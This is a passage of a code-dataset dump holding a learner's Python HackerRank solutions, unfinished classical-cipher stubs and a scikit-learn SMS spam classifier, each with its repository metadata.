"shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "k = list(map(int, input().split()))\nN = k[0]\nM = k[1]\n\nset1 = list(map(int, input().split()))\n\nA = set(map(int, input().split()))\nB = set(map(int, input().split()))\n\ntemp = sum((i in A) - (i in B) for i in set1)\nprint(temp)" }, { "alpha_fraction": 0.4781144857406616, "alphanum_fraction": 0.48821547627449036, "avg_line_length": 25.81818199157715, "blob_id": "c46862f2babe0e10f2eb9be087bfca3188a0b5a6", "content_id": "7c802057f66b1d16bd7f354a4a70585417b63ba5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 102, "num_lines": 11, "path": "/list_comprehension.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "if __name__ == '__main__':\n x = int(input(\"Enter X:\"))\n y = int(input(\"Enter Y:\"))\n z = int(input(\"Enter Z:\"))\n n = int(input(\"Enter N:\"))\n\n my_list = [[i,j,k] for i in range(x+1) for j in range(y+1) for k in range(z+1) if i + j + k != n ]\n\n my_list.sort()\n\n print(my_list)\n\n\n" }, { "alpha_fraction": 0.6783692240715027, "alphanum_fraction": 0.6828992366790771, "avg_line_length": 29.482759475708008, "blob_id": "1a76d833d3b6d82d54003c019062bcb48d566b3d", "content_id": "4931cd8852dde73499e95105df78d0f9f4487870", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 883, "license_type": "no_license", "max_line_length": 92, "num_lines": 29, "path": "/itertools_maximize_it.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# #my code but some test cases are wrong\n# k,m = input().split()\n# sum = 0\n# for i in range(int(k)):\n# l = max([int(x) for x in input().split())\n# sum+= l*l\n# print(sum%int(m))\n\n\n\n\nfrom itertools import product\n\n# taking input of k and m\nK,M = map(int,input().split())\n\n# taking input for k lines\n# in each line the first element will be the number of elements in that line so we ignore it\nN = (list(map(int, input().split()))[1:] for _ in range(K))\n\n# here we are using list comprehension\n# we are taking cartesian product of elementes of N list\n# we then take each list form this list of cartesian product and take sum of their squares\n#and store them in the results\nresults = [sum(num**2 for num in numbers) % M for numbers in product(*N)]\n#results = map(lambda x: sum(i**2 for i in x)%M, product(*N))\n\n# we are printing the max value from results list\nprint(max(results))" }, { "alpha_fraction": 0.7111650705337524, "alphanum_fraction": 0.7111650705337524, "avg_line_length": 40.29999923706055, "blob_id": "b778f972327c9586a629d72184b46a757cbb0286", "content_id": "c2706272cedc2ba7145a749d4541b6d6a95ef489", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 412, "license_type": "no_license", "max_line_length": 79, "num_lines": 10, "path": "/strict_superset.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to check if A is strict superset of other sets\n# input for set A\nA = set(map(int, input().split()))\nN = int(input())\n\n# here we are using all() method which returns true only if all are true\n# we are taking input for N sets in the equation itself by using comprehension\n# also we are checking if A is superset here\ntemp = all(A.issuperset(set(map(int, input().split()))) for _ in range(N))\nprint(temp)" }, { "alpha_fraction": 0.6322580575942993, "alphanum_fraction": 0.6322580575942993, "avg_line_length": 37.875, "blob_id": "96e393a0a102fa9fb2b061d089713262b3b62f57", "content_id": "cbd9bdaaac11492595436ceacf8fe2e41e80f443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 98, "num_lines": 8, "path": "/date_and_time_time_delta.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "from datetime import datetime as dt\n\n\nfmt = '%a %d %b %Y %H:%M:%S %z'\nfor i in range(int(input())):\n #strptime will format give time int number/date format and make it easy to process in equation\n print(int(abs((dt.strptime(input(), fmt) -\n dt.strptime(input(), fmt)).total_seconds())))" }, { "alpha_fraction": 0.6710875034332275, "alphanum_fraction": 0.6856763958930969, "avg_line_length": 31.826086044311523, "blob_id": "b697c552bf853a8d59f4f68a5f02f6edff19b28a", "content_id": "15545159021dce04faa9fb6053cc9770bd84bc63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 754, "license_type": "no_license", "max_line_length": 70, "num_lines": 23, "path": "/collections_namedtuple.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "from collections import namedtuple\n\n# taking input for number of students\nn = int(input())\n# taking names of different columns\nfields = input().split()\n\ntotal = 0 # total of marks\nfor i in range(n):\n # declaring a named tuple\n students = namedtuple('student',fields)\n # taking input for values of field\n field1, field2, field3,field4 = input().split()\n # placing this values in tuple\n student = students(field1,field2,field3,field4)\n # picking up the marks from tuple\n total += int(student.MARKS)\nprint('{0:.2f}'.format(total/n))\n\n# shorter method\n# here we only pick up the marks section from input\n# stu, marks = int(input()), input().split().index(\"MARKS\")\n# print (sum([int(input().split()[marks]) for _ in range(stu)]) / stu)" }, { "alpha_fraction": 0.6040608882904053, "alphanum_fraction": 0.6142131686210632, "avg_line_length": 23.375, "blob_id": "ecad00fe70cde147de2d5775be06fd8c97d8e127", "content_id": "d2c18b79a14063653dcdeee94f0f65707a248d81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 42, "num_lines": 8, "path": "/itertools_combinations.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "from itertools import combinations\n\na,b= input().split()\n\nfor i in range(1,int(b)+1):\n # x = (list(combinations(sorted(a),i)))\n for j in combinations(sorted(a),i):\n print(\"\".join(j))\n\n\n" }, { "alpha_fraction": 0.5799999833106995, "alphanum_fraction": 0.6200000047683716, "avg_line_length": 15.107142448425293, "blob_id": "91a1973cb77baf4be023b5d83256df3de24939a9", "content_id": "e59566bed823bd99d0535b0bbfc9f30425ef6339", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 53, "num_lines": 28, "path": "/anagram.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "#this a random program found in the notifications\n\n# s1 = input()\n# s2 = input()\n#\n# set1 = set()\n# set2 = set()\n#\n# for i in s1:\n# set1.add(i)\n# for i in s2:\n# set2.add(i)\n#\n# diff = set1.symmetric_difference(set2)\n# #print(diff)\n# print(len(diff))\n# # print(set1)\n# # print(set2)\n\n#Method 2:\ns1 = input()\ns2 = input()\n\n\ntotal = 0\nfor letter in \"abcdefghijklmnopqrstuvwxyz\":\n total += abs(s1.count(letter) - s2.count(letter))\nprint(total)" }, { "alpha_fraction": 0.6102564334869385, "alphanum_fraction": 0.6239316463470459, "avg_line_length": 26.85714340209961, "blob_id": "2601e754cff3263ee0fbb1cd496d2dd6098fec04", "content_id": "9cbc923fa28f2f1585201113a2e1fc3bc7c27318", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "no_license", "max_line_length": 73, "num_lines": 21, "path": "/collections_counter.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "from collections import Counter\n\nx = int(input())\n# using counter to create a dictionary\n# this dictonary will contain the count of each element of the string\nd = Counter(map(int,input().split())) # for this we have to map our input\n\nn = int(input())\nl1 = [] # earning = 0\n\nfor i in range(n):\n a,b = map(int, input().split())\n\n # checking if it exists in the dictonary\n if d[a]>0: # if a in d.keys() and d[a]>0:\n # adding money to total earning\n l1.append(b)\n # decrementing the value present by 1\n d[a]-= 1\n\nprint(sum(l1)) # print(earning)\n" }, { "alpha_fraction": 0.4881889820098877, "alphanum_fraction": 0.5244094729423523, "avg_line_length": 17.14285659790039, "blob_id": "8241b067042683930266ec0d5ac343978fb540f8", "content_id": "26aff35d282f40fd06d70b0f4a5daae0d72f8208", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 635, "license_type": "no_license", "max_line_length": 42, "num_lines": 35, "path": "/playfair_cipher_2.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def matrix(key):\n m = []\n alphabet = \"ABCDEFGHIKLMNOPQRSTUVWXYZ\"\n\n for i in key.upper():\n if i not in m:\n m.append(i)\n\n for i in alphabet:\n if i not in m:\n m.append(i)\n\n m_group = []\n for i in range(5):\n m_group.append('')\n m_group[0] = m[0:5]\n m_group[1] = m[5:10]\n m_group[2] = m[10:15]\n m_group[3] = m[15:20]\n m_group[4] = m[20:25]\n\n return m_group\n\ndef groups(text):\n for i in range(len(text)):\n pass\ndef encrypt():\n pass\ndef decrypt():\n pass\n\ntext = input(\"Enter Your message here:\")\nkey = input(\"Enter your key:\")\n\nprint(matrix(key))\n" }, { "alpha_fraction": 0.4727272689342499, "alphanum_fraction": 0.47727271914482117, "avg_line_length": 20, "blob_id": "0805232552f2c6a94e86119471488e6cf3528106", "content_id": "22faff50e26f21a939621261978e7ec96dc69a28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 440, "license_type": "no_license", "max_line_length": 33, "num_lines": 21, "path": "/minion_game.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def minion_game(string):\n vowels = 'AEIOU'\n\n k_score = 0\n s_score = 0\n\n for i in range(len(string)):\n if string[i] in vowels:\n k_score += (len(s)-i)\n else:\n s_score += (len(s)-i)\n\n if s_score > k_score:\n print(\"Stuart\", s_score)\n elif k_score > s_score:\n print(\"Kevin\", k_score)\n else:\n print(\"Draw\")\nif __name__ == '__main__':\n s = input()\n minion_game(s)" }, { "alpha_fraction": 0.6789297461509705, "alphanum_fraction": 0.7023411393165588, "avg_line_length": 28.799999237060547, "blob_id": "cc29a91e91c4d606da298b0f9cffd7d62cb28b0c", "content_id": "e1e2139eda7148ef86de4a6dc4d0e824bc2898c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 299, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/math_polar_coordinates.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "import cmath\n# taking input as a complex number\nn = complex(input())\n\n# taking out two arguements from the complex number\nr = abs(complex(n))\nr2 = cmath.phase(complex(n))\n\nprint(f'{r:.3f}\\n{r2:.3f}') # method not accepted by hackerrank\n# print(\"{0:.3f}\".format(r2)) # method accepted by hackerrank\n\n" }, { "alpha_fraction": 0.48534202575683594, "alphanum_fraction": 0.5114006400108337, "avg_line_length": 27, "blob_id": "2aa48766daed0b40a4ce1ec2bb374d88d94111c1", "content_id": "c7b69249c8df7d260bd0bb81ca022332cad9c07e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 307, "license_type": "no_license", "max_line_length": 69, "num_lines": 11, "path": "/string_formatting.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def print_formatted(number):\n print(bin(number))\n a = len(bin(number)[2:])\n #a = len(\"{0:b}\".format(number))\n #print(a)\n for num in range(1,number+1):\n print(\"{0:{a}} {0:{a}o} {0:{a}X} {0:{a}b}\".format(num,a = a))\n\nif __name__ == '__main__':\n n = int(input())\n print_formatted(n)" }, { "alpha_fraction": 0.6078431606292725, "alphanum_fraction": 0.6078431606292725, "avg_line_length": 28.190475463867188, "blob_id": "63b14b138ac9a460d8869bde1c94324507379abb", "content_id": "68cd9be06bf42ed0f744e7ab1ab252189b6da0b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 612, "license_type": "no_license", "max_line_length": 64, "num_lines": 21, "path": "/itertools_compress_the_string.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# # n = input()\n# # l = {}\n# # for i in n:\n# # a = n.count(i)\n# # if i not in l:\n# # l[i] = a\n# # print(*l)\n# from itertools import groupby\n# i,j = groupby(input())\n# print(*list(i))\n# print(*j)\n# # for i in n:\n# # print(len(list(i)))\n# # print(j)\n\nfrom itertools import groupby\n# here we are unpacking the items from the list comprehensiom\n# we are distributing the outputs of groupby function in a and b\n# here a is the element and b is the occurance of that number\n# after that we are taking the len of list(b) and int(a)\nprint(*[(len(list(b)), int(a)) for a, b in groupby(input())])" }, { "alpha_fraction": 0.5742297172546387, "alphanum_fraction": 0.5798319578170776, "avg_line_length": 31.545454025268555, "blob_id": "b2be0a02806685cabafa23fdb3ed7b0dc6e8b3f6", "content_id": "a5a5aa9fb360248ca4b6d9931da21fe40e7eb746", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 117, "num_lines": 11, "path": "/swap_cases.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def swap_cases(s):\n ans = []\n for i in s:\n if i.isupper() == True: #checking if the letter is in upper case, if true then it we convert it to lowercase\n ans.append(i.lower())\n else:\n ans.append(i.upper())\n s1 = ''.join(ans) # joining the elements of ans list to form a string\n print(s1)\n\nswap_cases(input())" }, { "alpha_fraction": 0.5547618865966797, "alphanum_fraction": 0.5571428537368774, "avg_line_length": 23, "blob_id": "64b4ef2fbb22cd685e8ece821d46f2b6b8173b1b", "content_id": "feb4d7ec6464ac86dc1a2085560947f502cc6f36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 840, "license_type": "no_license", "max_line_length": 57, "num_lines": 35, "path": "/row_transposition_cipher.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to implement row transposition cipher\n\n# taking input for\nkey = [l for l in input(\"Enter Key:\")]\nplain_text = ''.join(input(\"Enter the message:\").split())\n\nprint(\"Key is: \", key)\ncolumns = int(max(key))\nprint('No of columns is ',columns)\n\n# checking for nummber of rows:\nif len(plain_text) % columns == 0:\n rows = len(plain_text)//columns\nelse:\n rows = (len(plain_text)//columns) + 1\nprint('No of rows is ',rows)\n\nmatrix = []\n\n# for k in plain_text:\n# for i in range(rows):\n# for j in range(columns):\n# if k == '':\n# matrix.append('x')\n# else:\n# matrix.append(k)\n\nfor i in range(rows):\n for j in range(columns):\n if plain_text[i + j] == '':\n matrix.append('x')\n else:\n matrix.append(plain_text[i + j])\n\nprint(matrix)\n" }, { "alpha_fraction": 0.46954813599586487, "alphanum_fraction": 0.5461689829826355, "avg_line_length": 13.166666984558105, "blob_id": "ea37fcb795c6a9d89905f1a5cba96deae12bf035", "content_id": "36fcb01b8aae95b10e49ebc934acddb1f6673a9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 509, "license_type": "no_license", "max_line_length": 88, "num_lines": 36, "path": "/nested_lists.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "n = int(input())\n\nmy_list = []\nlist2 = []\n\nfor i in range(0,n):\n my_list.append([input(), float(input())])\nmy_list.sort()\n\nfor i in range(len(my_list)):\n list2.append(my_list[i][1])\n\na = list(set(list2))\na.sort()\n\nsecond_lowest = a[1]\n\nfor i in range(len(my_list)):\n if my_list[i][1] == second_lowest:\n print(my_list[i][0])\n\n\n\n# 5\n# Harry\n# 37.21\n# Berry\n# 37.21\n# Tina\n# 37.2\n# Akriti\n# 41\n# Harsh\n# 39\n\n#a = [['Harry', 37.21], ['Berry', 37.21], ['Tina', 37.2], ['Akriti', 41], ['Harsh', 39]]" }, { "alpha_fraction": 0.6948052048683167, "alphanum_fraction": 0.6948052048683167, "avg_line_length": 29.799999237060547, "blob_id": "72df4d2734d79e629cc5cf418dc607b9cca83a6a", "content_id": "526f7fc77e93cba10148588a3586cf5c9a19d15c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 77, "num_lines": 5, "path": "/math_mod_divmod.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "a, b = int(input()), int(input())\nprint(a//b)\nprint(a%b)\n# divmod function divides a by b and returns a tuple of quoient and remainder\nprint(divmod(a,b))\n" }, { "alpha_fraction": 0.6928089261054993, "alphanum_fraction": 0.7018850445747375, "avg_line_length": 35.52124786376953, "blob_id": "f7f4bfdebf8658b4b8c7f67a46721b56a171125f", "content_id": "48ce2defa1459d1218d8c1800b5cfcf08aeb7aac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12891, "license_type": "no_license", "max_line_length": 133, "num_lines": 353, "path": "/project.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "#% matplotlib\n#inline\nimport matplotlib.pyplot as plt\nimport csv\nfrom textblob import TextBlob\nimport pandas\nimport sklearn\nimport cPickle\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.metrics import classification_report, f1_score, accuracy_score, confusion_matrix\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.cross_validation import StratifiedKFold, cross_val_score, train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.learning_curve import learning_curve\n\n## loading data using Pandas\n\nmessages = pandas.read_csv(\n 'sms_spam.csv',\n names = [\"label\", \"message\"])\nprint(messages)\n\n## To get pivot of dataset\n\nmessages.groupby('label').describe()\n\n## adding extra column to get the length of the text\n\nmessages['length'] = messages['message'].map(lambda text: len(text))\nprint(messages.head())\n\n## plotting\n\nmessages.length.plot(bins=20, kind='hist')\n\nmessages.length.describe()\n\n## to check the longest messages\n\nprint(list(messages.message[messages.length > 900]))\n\n## checking out the difference between ham and spam\n\nmessages.hist(column='length', by='label', bins=50)\n\n\n## Data Preprocessing\n\n## we'll use the bag-of-words approach, where each unique word in a text will be represented by one number.\n\n## splitting it into tokens\n\ndef split_into_tokens(message):\n message = unicode(message, 'utf8') # convert bytes into proper unicode\n return TextBlob(message).words\n\n\n## original text\n\nmessages.message.head()\n\n## now text after tokenized\n\nmessages.message.head().apply(split_into_tokens)\n\n## Part of speech tag (POS)\n\nTextBlob(\"Hello world, how is it going?\").tags # list of (word, POS) pairs\n\n\n## lemmatizing --- normalize words into their base form\n\ndef split_into_lemmas(message):\n message = unicode(message, 'utf8').lower()\n words = TextBlob(message).words\n # for each word, take its \"base form\" = lemma\n return [word.lemma for word in words]\n\n\nmessages.message.head().apply(split_into_lemmas)\n\n## Data to Vectors\n\n# Now we'll convert each message, represented as a list of tokens (lemmas) above,\n# into a vector that machine learning models can understand.\n\n# Doing that requires essentially three steps, in the bag-of-words model:\n\n# 1. counting how many times does a word occur in each message (term frequency)\n# 2. weighting the counts, so that frequent tokens get lower weight (inverse document frequency)\n# 3. normalizing the vectors to unit length, to abstract from the original text length (L2 norm)\n\n# Each vector has as many dimensions as there are unique words in the SMS corpus:\n\nbow_transformer = CountVectorizer(analyzer = split_into_lemmas).fit(messages['message'])\nprint(len(bow_transformer.vocabulary_))\n\n# Here we used `scikit-learn` (`sklearn`), a powerful Python library for teaching machine learning.\n# It contains a multitude of various methods and options.\n\n# Let's take one text message and get its bag-of-words counts as a vector, putting to use our new `bow_transformer`:\n\n## Feature Engineering\n\nmessage4 = messages['message'][3]\nprint(message4)\n\nbow4 = bow_transformer.transform([message4])\nprint(bow4)\nprint(bow4.shape)\n\n# So, nine unique words in message nr. 4, two of them appear twice, the rest only once.\n# lets check what are these words the appear twice?\n\nprint(bow_transformer.get_feature_names()[6736])\nprint(bow_transformer.get_feature_names()[8013])\n\nmessages_bow = bow_transformer.transform(messages['message'])\nprint('sparse matrix shape:', messages_bow.shape)\nprint('number of non-zeros:', messages_bow.nnz)\nprint('sparsity: %.2f%%' % (100.0 * messages_bow.nnz / (messages_bow.shape[0] * messages_bow.shape[1])))\n\n# And finally, after the counting, the term weighting and normalization\n# can be done with [TF-IDF] using scikit-learn's `TfidfTransformer`:\n\ntfidf_transformer = TfidfTransformer().fit(messages_bow)\ntfidf4 = tfidf_transformer.transform(bow4)\nprint(tfidf4)\n\n# To check what is the IDF (inverse document frequency) of the word `\"u\"`? Of word `\"university\"`?\n\nprint\ntfidf_transformer.idf_[bow_transformer.vocabulary_['u']]\nprint(tfidf_transformer.idf_[bow_transformer.vocabulary_['university']])\n\n# To transform the entire bag-of-words corpus into TF-IDF corpus at once:\n\nmessages_tfidf = tfidf_transformer.transform(messages_bow)\nprint(messages_tfidf.shape)\n\n## Training a model\n# We'll be using scikit-learn here, choosing the [Naive Bayes](http://en.wikipedia.org/wiki/Naive_Bayes_classifier)\n# classifier to start with:\n\n#% time\nspam_detector = MultinomialNB().fit(messages_tfidf, messages['label'])\n\n\n\n\n# Let's try classifying our single random message:\nprint('predicted:', spam_detector.predict(tfidf4)[0])\nprint('expected:', messages.label[3])\n\nall_predictions = spam_detector.predict(messages_tfidf)\nprint(all_predictions)\n\n## Calculating accuracy and confusion matrix on Training data which will definitely give good accuracy\n\nprint('accuracy', accuracy_score(messages['label'], all_predictions))\nprint('confusion matrix\\n', confusion_matrix(messages['label'], all_predictions))\nprint('(row=expected, col=predicted)')\n\nplt.matshow(confusion_matrix(messages['label'], all_predictions), cmap=plt.cm.binary, interpolation='nearest')\nplt.title('confusion matrix')\nplt.colorbar()\nplt.ylabel('expected label')\nplt.xlabel('predicted label')\n\nprint(classification_report(messages['label'], all_predictions))\n\n## splitting the data into training and testing\n\nmsg_train, msg_test, label_train, label_test = \\\n train_test_split(messages['message'], messages['label'], test_size=0.2)\n\nprint(len(msg_train), len(msg_test), len(msg_train) + len(msg_test))\n\npipeline = Pipeline([\n ('bow', CountVectorizer(analyzer=split_into_lemmas)), # strings to token integer counts\n ('tfidf', TfidfTransformer()), # integer counts to weighted TF-IDF scores\n ('classifier', MultinomialNB()), # train on TF-IDF vectors w/ Naive Bayes classifier\n])\n\n## Cross Validation\n\n# A common practice is to partition the training set again, into smaller subsets; for example, 5 equally sized subsets.\n# Then we train the model on four parts, and compute accuracy on the last part (called \"validation set\").\n# Repeated five times (taking different part for evaluation each time), we get a sense of model \"stability\".\n# If the model gives wildly different scores for different subsets, it's a sign something is wrong (bad data, or bad model variance).\n# Go back, analyze errors, re-check input data for garbage, re-check data cleaning.\n\nscores = cross_val_score(pipeline, # steps to convert raw messages into models\n msg_train, # training data\n label_train, # training labels\n cv=10, # split data randomly into 10 parts: 9 for training, 1 for scoring\n scoring='accuracy', # which scoring metric?\n n_jobs=-1, # -1 = use all cores = faster\n )\nprint(scores)\nprint(scores.mean(), scores.std())\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=-1, train_sizes=np.linspace(.1, 1.0, 5)):\n \"\"\"\n Generate a simple plot of the test and traning learning curve.\n\n Parameters\n ----------\n estimator : object type that implements the \"fit\" and \"predict\" methods\n An object of that type which is cloned for each validation.\n\n title : string\n Title for the chart.\n\n X : array-like, shape (n_samples, n_features)\n Training vector, where n_samples is the number of samples and\n n_features is the number of features.\n\n y : array-like, shape (n_samples) or (n_samples, n_features), optional\n Target relative to X for classification or regression;\n None for unsupervised learning.\n\n ylim : tuple, shape (ymin, ymax), optional\n Defines minimum and maximum yvalues plotted.\n\n cv : integer, cross-validation generator, optional\n If an integer is passed, it is the number of folds (defaults to 3).\n Specific cross-validation objects can be passed, see\n sklearn.cross_validation module for the list of possible objects\n\n n_jobs : integer, optional\n Number of jobs to run in parallel (default 1).\n \"\"\"\n plt.figure()\n plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return plt\n\n#% time\nplot_learning_curve(pipeline, \"accuracy vs. training set size\", msg_train, label_train, cv=5)\n\n# At this point, we have two options:\n\n# 1. use more training data, to overcome low model complexity\n# 2. use a more complex (lower bias) model to start with, to get more out of the existing data\n\nparams = {\n 'tfidf__use_idf': (True, False),\n 'bow__analyzer': (split_into_lemmas, split_into_tokens),\n}\n\ngrid = GridSearchCV(\n pipeline, # pipeline from above\n params, # parameters to tune via cross validation\n refit=True, # fit using all available data at the end, on the best found param combination\n n_jobs=-1, # number of cores to use for parallelization; -1 for \"all cores\"\n scoring='accuracy', # what score are we optimizing?\n cv=StratifiedKFold(label_train, n_folds=5), # what type of cross validation to use\n)\n\n#% time\nnb_detector = grid.fit(msg_train, label_train)\nprint(nb_detector.grid_scores_)\n\nprint(nb_detector.predict_proba([\"Hi mom, how are you?\"])[0])\nprint(nb_detector.predict_proba([\"WINNER! Credit for free!\"])[0])\n\nprint(nb_detector.predict([\"Hi mom, how are you?\"])[0])\nprint(nb_detector.predict([\"WINNER! Credit for free!\"])[0])\n\n# And overall scores on the test set, the one we haven't used at all during training\n\npredictions = nb_detector.predict(msg_test)\nprint(confusion_matrix(label_test, predictions))\nprint(classification_report(label_test, predictions))\n\n#############################################################################################################\n\n################## SVM #########################################\n\npipeline_svm = Pipeline([\n ('bow', CountVectorizer(analyzer=split_into_lemmas)),\n ('tfidf', TfidfTransformer()),\n ('classifier', SVC()), # <== change here\n])\n\n# pipeline parameters to automatically explore and tune\nparam_svm = [\n {'classifier__C': [1, 10, 100, 1000], 'classifier__kernel': ['linear']},\n {'classifier__C': [1, 10, 100, 1000], 'classifier__gamma': [0.001, 0.0001], 'classifier__kernel': ['rbf']},\n]\n\ngrid_svm = GridSearchCV(\n pipeline_svm, # pipeline from above\n param_grid=param_svm, # parameters to tune via cross validation\n refit=True, # fit using all data, on the best detected classifier\n n_jobs=-1, # number of cores to use for parallelization; -1 for \"all cores\"\n scoring='accuracy', # what score are we optimizing?\n cv=StratifiedKFold(label_train, n_folds=5), # what type of cross validation to use\n)\n\n#%time\nsvm_detector = grid_svm.fit(msg_train, label_train) # find the best combination from param_svm\nprint(svm_detector.grid_scores_)\n\nprint(svm_detector.predict([\"Hi mom, how are you?\"])[0])\nprint(svm_detector.predict([\"WINNER! Credit for free!\"])[0])\n\nprint(confusion_matrix(label_test, svm_detector.predict(msg_test)))\nprint(classification_report(label_test, svm_detector.predict(msg_test)))\n\nprint(confusion_matrix(label_test, svm_detector.predict(msg_test)))\nprint(classification_report(label_test, svm_detector.predict(msg_test)))\n\n## Productionalizing a predictor\n\n# store the spam detector to disk after training\nwith open('sms_spam_detector.pkl', 'wb') as fout:\n cPickle.dump(svm_detector, fout)\n\n# ...and load it back, whenever needed, possibly on a different machine\nsvm_detector_reloaded = cPickle.load(open('sms_spam_detector.pkl'))\n\nprint('before:', svm_detector.predict([message4])[0])\nprint('after:', svm_detector_reloaded.predict([message4])[0])" }, { "alpha_fraction": 0.6301369667053223, "alphanum_fraction": 0.6301369667053223, "avg_line_length": 10.578947067260742, "blob_id": "3cee4ba2747431bf0e13554d7845c59907a7dcb3", "content_id": "67c6b523dbbaa9d1b71ab1abd74c5b64d96f9bcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 57, "num_lines": 19, "path": "/itertools_combinations_with_replacements.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "from itertools import combinations_with_replacement\n\na,b = input().split()\n\nx = list(combinations_with_replacement(sorted(a),int(b)))\nfor i in x:\n print(\"\".join(i))\n\n\n# AA\n# AC\n# AH\n# AK\n# CC\n# CH\n# CK\n# HH\n# HK\n# KK" }, { "alpha_fraction": 0.5038461685180664, "alphanum_fraction": 0.5730769038200378, "avg_line_length": 15.3125, "blob_id": "331964ca5f000d0ff3af5cf10b57d3375f1ad150", "content_id": "84bbade0b5cd86a05179c51086914d3a6e83d800", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 49, "num_lines": 16, "path": "/symmtric_diff.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "m = int(input())\nmy_set1 = set(map(int, input().split()))\nn = int(input())\nmy_set2 = set(map(int, input().split()))\n\nfinal_set = my_set1.symmetric_difference(my_set2)\nx = sorted(final_set)\n\nfor i in x:\n print(i)\n\n#\n# 4\n# 2 4 5 9\n# 4 00\n# 2 4 11 12=" }, { "alpha_fraction": 0.5583333373069763, "alphanum_fraction": 0.5583333373069763, "avg_line_length": 19.16666603088379, "blob_id": "dc2ae3919af8ca8ec2fc0b69d7495509a8fc9ce8", "content_id": "ee7cd49f65943d9d9a388f42da159f6bc1eda7c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 120, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/print_rangoli.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def print_rangoli(size):\n # your code goes here\n\nif __name__ == '__main__':\n n = int(input())\n print_rangoli(n)" }, { "alpha_fraction": 0.47641509771347046, "alphanum_fraction": 0.4921383559703827, "avg_line_length": 31.615385055541992, "blob_id": "b9f62df6dd87e8e52bb1b22e02869f2f6cff1c7c", "content_id": 